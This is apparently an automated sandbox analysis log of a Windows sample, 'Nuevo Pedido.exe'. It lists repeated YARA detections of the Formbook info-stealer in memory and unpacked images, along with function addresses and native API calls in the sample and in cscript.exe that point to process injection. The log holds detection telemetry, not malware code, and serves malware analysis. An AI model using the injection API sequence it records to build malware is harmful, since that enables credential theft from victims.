            Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: Nuevo Pedido.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 0_2_00A85C240_2_00A85C24
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 0_2_02BC82500_2_02BC8250
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 0_2_02BCD2F80_2_02BCD2F8
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 0_2_05635AA00_2_05635AA0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 0_2_05635AB00_2_05635AB0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_004010303_2_00401030
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041BC783_2_0041BC78
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00408C7B3_2_00408C7B
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00408C803_2_00408C80
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041BD013_2_0041BD01
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00402D903_2_00402D90
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041BEE03_2_0041BEE0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00402FB03_2_00402FB0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041CFB63_2_0041CFB6
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00DE5C243_2_00DE5C24
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BF9003_2_019BF900
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019D41203_2_019D4120
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A820A83_2_01A820A8
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019CB0903_2_019CB090
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E20A03_2_019E20A0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A828EC3_2_01A828EC
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A710023_2_01A71002
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EEBB03_2_019EEBB0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7DBD23_2_01A7DBD2
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A82B283_2_01A82B28
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A822AE3_2_01A822AE
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E25813_2_019E2581
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A825DD3_2_01A825DD
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019CD5E03_2_019CD5E0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A82D073_2_01A82D07
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B0D203_2_019B0D20
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A81D553_2_01A81D55
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C841F3_2_019C841F
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7D4663_2_01A7D466
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A81FF13_2_01A81FF1
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A82EF73_2_01A82EF7
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019D6E303_2_019D6E30
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7D6163_2_01A7D616
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478841F16_2_0478841F
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483D46616_2_0483D466
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04770D2016_2_04770D20
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_048425DD16_2_048425DD
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04842D0716_2_04842D07
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478D5E016_2_0478D5E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04841D5516_2_04841D55
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A258116_2_047A2581
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04796E3016_2_04796E30
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04842EF716_2_04842EF7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483D61616_2_0483D616
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04841FF116_2_04841FF1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_048420A816_2_048420A8
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_048428EC16_2_048428EC
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483100216_2_04831002
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A20A016_2_047A20A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478B09016_2_0478B090
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479412016_2_04794120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477F90016_2_0477F900
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_048422AE16_2_048422AE
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483DBD216_2_0483DBD2
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04842B2816_2_04842B28
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AEBB016_2_047AEBB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061BC7816_2_0061BC78
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00608C7B16_2_00608C7B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00608C8016_2_00608C80
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061BD0116_2_0061BD01
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00602D9016_2_00602D90
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061BEE016_2_0061BEE0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00602FB016_2_00602FB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061CFB616_2_0061CFB6
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: String function: 019BB150 appears 35 times
            Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0477B150 appears 35 times
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_004185E0 NtCreateFile,3_2_004185E0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00418690 NtReadFile,3_2_00418690
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00418710 NtClose,3_2_00418710
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_004187C0 NtAllocateVirtualMemory,3_2_004187C0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_004185DA NtCreateFile,3_2_004185DA
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041870C NtReadFile,NtClose,3_2_0041870C
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_004187BA NtAllocateVirtualMemory,3_2_004187BA
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F99A0 NtCreateSection,LdrInitializeThunk,3_2_019F99A0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_019F9910
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F98F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_019F98F0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9840 NtDelayExecution,LdrInitializeThunk,3_2_019F9840
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9860 NtQuerySystemInformation,LdrInitializeThunk,3_2_019F9860
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_019F9A00
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9A20 NtResumeThread,LdrInitializeThunk,3_2_019F9A20
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9A50 NtCreateFile,LdrInitializeThunk,3_2_019F9A50
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F95D0 NtClose,LdrInitializeThunk,3_2_019F95D0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9540 NtReadFile,LdrInitializeThunk,3_2_019F9540
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9780 NtMapViewOfSection,LdrInitializeThunk,3_2_019F9780
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F97A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_019F97A0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9FE0 NtCreateMutant,LdrInitializeThunk,3_2_019F9FE0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9710 NtQueryInformationToken,LdrInitializeThunk,3_2_019F9710
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F96E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_019F96E0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_019F9660
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F99D0 NtCreateProcessEx,3_2_019F99D0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9950 NtQueueApcThread,3_2_019F9950
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F98A0 NtWriteVirtualMemory,3_2_019F98A0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9820 NtEnumerateKey,3_2_019F9820
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019FB040 NtSuspendThread,3_2_019FB040
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019FA3B0 NtGetContextThread,3_2_019FA3B0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9B00 NtSetValueKey,3_2_019F9B00
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9A80 NtOpenDirectoryObject,3_2_019F9A80
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9A10 NtQuerySection,3_2_019F9A10
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F95F0 NtQueryInformationFile,3_2_019F95F0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019FAD30 NtSetContextThread,3_2_019FAD30
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9520 NtWaitForSingleObject,3_2_019F9520
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9560 NtWriteFile,3_2_019F9560
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019FA710 NtOpenProcessToken,3_2_019FA710
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9730 NtQueryVirtualMemory,3_2_019F9730
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019FA770 NtOpenThread,3_2_019FA770
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9770 NtSetInformationFile,3_2_019F9770
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9760 NtOpenProcess,3_2_019F9760
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F96D0 NtCreateKey,3_2_019F96D0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9610 NtEnumerateValueKey,3_2_019F9610
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9650 NtQueryValueKey,3_2_019F9650
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9670 NtQueryInformationProcess,3_2_019F9670
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9540 NtReadFile,LdrInitializeThunk,16_2_047B9540
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B95D0 NtClose,LdrInitializeThunk,16_2_047B95D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9660 NtAllocateVirtualMemory,LdrInitializeThunk,16_2_047B9660
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9650 NtQueryValueKey,LdrInitializeThunk,16_2_047B9650
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B96E0 NtFreeVirtualMemory,LdrInitializeThunk,16_2_047B96E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B96D0 NtCreateKey,LdrInitializeThunk,16_2_047B96D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9710 NtQueryInformationToken,LdrInitializeThunk,16_2_047B9710
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9FE0 NtCreateMutant,LdrInitializeThunk,16_2_047B9FE0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9780 NtMapViewOfSection,LdrInitializeThunk,16_2_047B9780
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9860 NtQuerySystemInformation,LdrInitializeThunk,16_2_047B9860
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9840 NtDelayExecution,LdrInitializeThunk,16_2_047B9840
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,16_2_047B9910
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B99A0 NtCreateSection,LdrInitializeThunk,16_2_047B99A0
